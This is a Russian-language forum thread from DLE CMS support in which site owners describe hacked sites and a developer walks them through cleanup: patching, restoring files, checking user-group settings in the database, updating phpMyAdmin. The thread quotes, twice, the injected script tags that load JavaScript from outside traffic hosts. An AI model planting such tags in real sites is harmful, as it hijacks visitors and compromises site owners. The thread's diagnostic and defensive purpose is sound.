Взломали сайт

[ultroff 0]

Сегодня при заходе на свой сайт обнаруживаю всплывающее окно.

В кеще страниц вижу многократно прописанный код типа:

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7833"></script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script><table>

Защита от шеллов прописана. Что можно сделать?

Обыскал все файлы, нет изменений, удаляю кеш страниц, генерится новый, опять со скриптами

[celsoft 5 995]

Смотрите темы:

http://forum.dle-news.ru/index.php?showtopic=53254

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

также удаляйте сторонние скрипты со своего сервера, у вас их там много.

Более того на сайте не установлены патчи безопасности, вышедшие еще несколько месяцев назад http://dle-news.ru/bags/ в частности http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html

Ставьте патчи, восстанавливайте оригинальные файлы скрипта, проверяйте и удаляйте лишних администраторов, проверяйте раздел управления рекламой в админпанели.

Ссылку на ваш сайт удалил, т.к. он уязвим.

[ultroff 0]

этот поставил сразу как он вышел http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html

предыдущие багфиксы, да, пропустил

администратор всего один, скриптов два, оба платные, раздел рекламы почистил сразу же

рою дальше, заметил особенность - в кеше эти поганые урлы появляются только при первой генерации, как только добавишь коммент или новость, файл кеша обновляется, и урлов уже нет. Это может о чем то говорить?

[celsoft 5 995]

этот поставил сразу как он вышел http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html

Ничего у вас не стоит, я проверял ваш сайт полчаса назад, когда смотрел ваш сайт и этот патч установлен не был. Поэтому как вы его устанавливали я не знаю

рою дальше, заметил особенность - в кеше эти поганые урлы появляются только при первой генерации, как только добавишь коммент или новость, файл кеша обновляется, и урлов уже нет. Это может о чем то говорить?

смотрите кстати настройки групп, код мог быть прописан в префикс у группы.

скриптов два, оба платные,

это ничего не значит

[ultroff 0]

Патч установлен был, 24.09, ну не в этом дело. Спасибо за поддержку.

Я правильно полагаю, что на сервере должны быть файлы с измененной датой, если менялись через шелл, верно?

[celsoft 5 995]

Патч установлен был, 24.09, ну не в этом дело. Спасибо за поддержку.

Как не в этом? Еще как в этом. Вы поймите, я не строю предположения ставили ли вы патч или нет, я захожу на ваш сайт и проверяю, подвержен он уязвимости или нет. Так вот ваш сайт подвержен, т.е. патч не стоит 100%, и вам не спорить нужно, а срочно ставить патч. Я вот даже сейчас проверил еще раз, и ничего на данный момент у вас не стоит. Ставьте патч незамедлительно иначе все ваши действия ничем вам не помогут.

Я правильно полагаю, что на сервере должны быть файлы с измененной датой, если менялись через шелл, верно?

необязательно, этот js код мог быть вставлен в настройки групп и хранится теперь в БД а не в файлах. Датами файлов можно легко управлять через шелл, поэтому на изменения даты даже не смотрите, она может не меняться.

[ultroff 0]

Не спорю, патч скачал, установил.

этот js код мог быть вставлен в настройки групп и хранится теперь в БД а не в файлах

нашелся! и действительно вставлен в настройки групп!

[celsoft 5 995]

Не спорю, патч скачал, установил.

теперь у вас поиск не работает. Читайте внимательно в новости

Либо просто скачайте и скопируйте на свой сервер патч для версии 9.0: http://dle-news.ru/files/dle90_path.zip, изменения для более старых версий скрипта, вносятся вручную, как указано выше.

у вас же не версия 9.0, вам вручную нужно вносить изменения в файлы, которые указаны в данной новости, а не копировать файлы от 9.0

Восстановите опять оригинальные файлы от вашей версии скрипта, и вносите изменения в файлы вручную как указано.

[ultroff 0]

да, невнимательность подвела, редактировал только fullsearch, про search забыл. Ну чтоже, огромный респект вам, большое спасибо!

[celsoft 5 995]

ultroff,

Теперь все нормально, патч стоит.

[Tibet 0]

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7833"></script><script language="JavaScript" charset="windows-1251" src="http://livetraf.com/js/bodyclick.php?id=2194"></script><table>

У меня такая же хрень - теперь буду во время обновляться!

Вдобавок нашёл у себя в папке с софтом, который вручную заливал (эту папку антивирус DLE не сканил) - порядка 1000 страниц-дорвеев на всякие поиски-по-базам.ру фамилий людей и тд. Так что народ ищите сюрпризы во всех папках, которые не сканирует антивирус DLE!

Вот еще мне помогает проверка сайта на вирусы на 2ip.ru - может тоже кому пригодится.

И у меня вопрос по обновлению движка версии 7.3.

Летом мне переносили сайт на другой сервер - и с тех пор у одного сайта почему-то нельзя в почти всех папках удалять/переименовывать файлы, менять им права и тд. В принципе всё работает, меня пока всё устраивает, просто не хочу дёргать хостера...

Но из-за этого нельзя пропатчить движок, закрыв уязвимости. Скажите пожалуйста - такой глюк фтп автоматически защищает от взлома непропатченного движка (ведь если даже я на фтп не могу ничего сделать с файлами - то по идее и злоумышленники не смогут) или нет?

[celsoft 5 995]

Скажите пожалуйста - такой глюк фтп автоматически защищает от взлома непропатченного движка (ведь если даже я на фтп не могу ничего сделать с файлами - то по идее и злоумышленники не смогут) или нет?

Нет, все зависит от причин. У пользователя FTP прав может и не быть, а у веб быть, опять таки патчи безопасности предотврящают попадание злоумышленника в базу данных.

[Sarvan 35]

У кого на сервере ProFTPD стоит, тоже очень актуально. Много людей пострадало за последнее время.

http://www.opennet.ru/opennews/art.shtml?num=28866

http://www.opennet.ru/opennews/art.shtml?num=28476

[fortune7 1]

Братцы! Ломанули сайт лицуха _http://kurdistan-post.ru, залили шел во все папки с правами 777, что делать? Пока поменял все на 755, будет ли движок с такими правами функционировать? Как оберечься от дальнейших вредных действий!?

[celsoft 5 995]

fortune7,

Первое что нужно сделать, это удалить все посторонние модификации и скрипты с сервера, восстановить оригинальные файлы на сервере из архива дистрибутива.

Также проверить что на вашем сервере установлена актуальная версия phpMyAdmin, и если это не так, то обновить до актуальной версии. Послее время шеллы заливают через него, т.к. в нем обнаружена серьезная уязвимость.